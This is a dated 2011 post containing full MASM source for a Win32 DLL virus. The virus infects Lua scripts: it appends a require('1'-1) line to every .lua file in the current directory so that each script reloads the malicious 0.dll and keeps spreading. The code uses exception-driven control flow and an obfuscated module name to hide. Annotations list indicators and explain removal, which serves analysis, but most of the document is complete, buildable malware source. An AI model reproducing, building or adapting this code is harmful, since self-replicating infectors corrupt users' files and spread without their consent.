Luna. одноглазый.
31-01-2011 19:38
; MASM source, 32-bit flat model, stdcall. Builds a Win32 DLL whose only export is
; luaopen_0 (see the 0.def listing at the end of the page). The sample is a file
; infector that appends a require() line to *.lua files; annotated here for analysis.
.486
.model flat, stdcall
include windows.inc                 ; WIN32_FIND_DATA (cFileName / nFileSizeLow offsets used below)
include kernel32.inc                ; FindFirstFile, FindNextFile, CreateFileA, SetFilePointer, ReadFile, WriteFile, CloseHandle
includelib kernel32.lib
.code
;-------------------------------------------------------------------------------
; BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID) -- named _DLL, selected as the
; entry point by 'end _DLL'. Returns TRUE unconditionally, so the DLL loads for
; every reason code. push imm8 / pop eax (3 bytes) is used instead of
; mov eax, 1 (5 bytes): the whole sample trades speed for size.
;-------------------------------------------------------------------------------
_DLL proc
push 1
pop eax                             ; eax = 1 (TRUE)
ret 0ch                             ; stdcall: callee pops the three 4-byte arguments
_DLL endp
;-------------------------------------------------------------------------------
;we run here to hide
;-------------------------------------------------------------------------------
assume fs:nothing                   ; let MASM accept fs:[...] operands; fs:[0] is the SEH chain head the code below links into
;-------------------------------------------------------------------------------
; luaopen_0 -- the exported Lua module entry point (LIBRARY 0 / EXPORTS luaopen_0
; in the .def listing below).
; Infection chain: a script that ends in require('1'-1) is executed; Lua's
; arithmetic coercion turns '1'-1 into 0, so this is require(0), i.e. module "0",
; and the loader resolves 0.dll on package.cpath and calls luaopen_0.
; Behaviour: enumerate *.lua in the current directory, open each one read/write
; and hand it to infect_lua, which appends the 15-byte tail <0x0C>require('1'-1)
; unless the file already ends with the 4 bytes '-1).
; Control flow is exception-driven: each stage finishes with int 3, and the SEH
; handler for that stage -- installed so that a call's return address IS the
; handler -- restores esp and the pushad'ed registers, then continues the loop
; or returns to Lua. No RtlUnwind is ever called.
; Analysis notes: under a debugger the int 3 instructions stop there before the
;   handler runs. Indicators: a file named 0.dll exporting luaopen_0 in a Lua
;   cpath directory, and .lua files whose last 15 bytes are <0x0C>require('1'-1)
;   (last 4 bytes '-1), which is also the sample's own "already infected" test).
;   The infector only appends, so stripping that tail restores a script.
;   Propagation is confined to the process's current directory: the search mask
;   carries no path, and cFileName is opened relative to the same directory.
; Registers: ebx = 0 throughout; edi = &find_data (512-byte frame buffer);
;   esi = search handle in the loop, read buffer inside infect_lua.
;-------------------------------------------------------------------------------
luaopen_0 proc
pushad                              ; saved state is restored by the outer SEH handler, not by a normal epilogue
xor ebx, ebx                        ; ebx = 0 for the rest of the routine (zero constant and fs:[0] base)
call start_v                        ; pushes the address of the next line: that address becomes the outer SEH handler
;--- outer SEH handler -----------------------------------------------------
; Entered by the OS when the int 3 after the directory loop fires.
; Stack on entry: [ret][ExceptionRecord*][EstablisherFrame*][Context*][Dispatcher*]
pop eax                             ; discard handler return address
pop eax                             ; discard ExceptionRecord pointer
pop esp                             ; esp = EstablisherFrame = the frame saved by 'mov fs:[ebx], esp' in start_v
xor eax, eax
pop fs:[eax]                        ; unlink the frame: fs:[0] = previous handler (the value pushed by 'push fs:[ebx]')
pop eax                             ; discard the handler address (the 'call start_v' return address)
popad                               ; restore the registers saved by pushad at entry
xor eax, eax                        ; return value 0: the module pushes no Lua results
ret                                 ; back to Lua's require() caller straight from handler context
start_v:
push fs:[ebx]                       ; frame.next = current fs:[0]
mov fs:[ebx], esp                   ; install frame: fs:[0] -> [next][handler]; handler = return address of 'call start_v'
enter 200h, 0                       ; 512-byte local buffer used as WIN32_FIND_DATAA (318 bytes, so it fits)
mov edi, esp                        ; edi = &find_data for the whole loop
push edi                            ; lpFindFileData
call find_f                         ; pushes the address of the "*.lua" string below as lpFileName
db "*", ".", "l", "u", "a", 0 ;there are .wlua files but we infect the most common type
find_f:
call FindFirstFile                  ; FindFirstFile("*.lua", &find_data): current directory only
xchg esi, eax                       ; esi = search handle; INVALID_HANDLE_VALUE is not checked, the loop runs regardless
open_f:
; CreateFileA(&find_data.cFileName,
;             3 /* FILE_READ_DATA|FILE_WRITE_DATA */, 3 /* FILE_SHARE_READ|FILE_SHARE_WRITE */,
;             NULL, 3 /* OPEN_EXISTING */, 0, NULL)      -- pushed right to left
push ebx
push ebx
push 3
push ebx
push 3
push 3
lea ecx, dword ptr [edi + WIN32_FIND_DATA.cFileName]
push ecx
call CreateFileA
push eax                            ; hFile: stays on the stack until CloseHandle below consumes it
pushad                              ; saved state restored by infect_lua's SEH handler (which is the line after the call)
call infect_lua                     ; eax = hFile on entry; return address = SEH handler for infect_lua's frame
;--- SEH handler for infect_lua's frame ------------------------------------
pop eax
pop eax
pop esp                             ; esp = infect_lua's frame
xor eax, eax
pop fs:[eax]                        ; restore the outer frame as fs:[0]
pop eax
popad                               ; state as before 'call infect_lua'; hFile is now on top of the stack
call CloseHandle                    ; CloseHandle(hFile)
push edi
push esi
call FindNextFile                   ; FindNextFile(hSearch, &find_data)
test eax, eax
jnz open_f                          ; next *.lua; falls through when the enumeration is exhausted
int 3                               ; deliberate breakpoint: the exception reaches the outer handler, which returns to Lua
;-------------------------------------------------------------------------------
;infect LUA script files
;-------------------------------------------------------------------------------
; infect_lua -- in: eax = hFile, edi = &find_data, ebx = 0.
; Never returns normally: it ends in int 3 and its SEH handler (the return
; address of 'call infect_lua') takes over. All arguments for the four API calls
; are pushed up front and consumed in call order:
;   SetFilePointer(hFile, nFileSizeLow-4, NULL, FILE_BEGIN)
;   ReadFile(hFile, buf, 4, &bytesRead, NULL)
;   SetFilePointer(hFile, 0, NULL, FILE_END)
;   WriteFile(hFile, tail, 15, &bytesWritten, NULL)
; The lpOverlapped slot of ReadFile/WriteFile doubles as the byte-count output
; slot ('push esp' right after 'push ebx'), which is why no separate local exists.
;-------------------------------------------------------------------------------
infect_lua proc
push fs:[ebx]                       ; install a second SEH frame; handler = return address of 'call infect_lua'
mov fs:[ebx], esp
push ebx                            ; zeroed 4-byte read buffer
mov esi, esp                        ; esi = &buffer
push ebx                            ; WriteFile lpOverlapped = NULL (also the bytesWritten slot)
push esp                            ; WriteFile lpNumberOfBytesWritten -> previous slot
push 0fh                            ; WriteFile nNumberOfBytesToWrite = 15
db 0e8h                             ; 'call' over the 15-byte tail below: pushes its address as WriteFile lpBuffer
dd 0fh
db 0ch, "require('1'-1)"
;obfuscated DLL name ;)
;CR+LF is 0D 0A but we can use 0A, 0B, 0C, 0D individually to save 1-byte
;and if individually then we are appended to last line
;last four bytes are our infection marker
push eax                            ; WriteFile hFile
push 2                              ; SetFilePointer dwMoveMethod = FILE_END
push ebx                            ; lpDistanceToMoveHigh = NULL
push ebx                            ; lDistanceToMove = 0
push eax                            ; SetFilePointer hFile
push ebx                            ; ReadFile lpOverlapped = NULL (also the bytesRead slot)
push esp                            ; ReadFile lpNumberOfBytesRead -> previous slot
push 4                              ; ReadFile nNumberOfBytesToRead
push esi                            ; ReadFile lpBuffer
push eax                            ; ReadFile hFile
push ebx                            ; SetFilePointer dwMoveMethod = FILE_BEGIN
push ebx                            ; lpDistanceToMoveHigh = NULL
mov ecx, dword ptr [edi + WIN32_FIND_DATA.nFileSizeLow]
sub ecx, 4                          ; offset of the last 4 bytes; files shorter than 4 bytes are not special-cased
push ecx                            ; lDistanceToMove
push eax                            ; SetFilePointer hFile
call SetFilePointer                 ; seek to size-4
call ReadFile                       ; read the last 4 bytes into [esi]
cmp dword ptr [esi], ")1-'"         ; MASM puts the literal's last char in the low byte, so this matches file bytes '-1)
je infect_int                       ; already carries the tail: skip
call SetFilePointer                 ; seek to end of file
call WriteFile                      ; append <0x0C>require('1'-1), 15 bytes
infect_int:
int 3 ;SEH protected
;exit to avoid stack-cleaning
infect_lua endp
luaopen_0 endp
end _DLL                            ; DLL entry point (DllMain) = _DLL
----
0.def file content:
LIBRARY 0
EXPORTS luaopen_0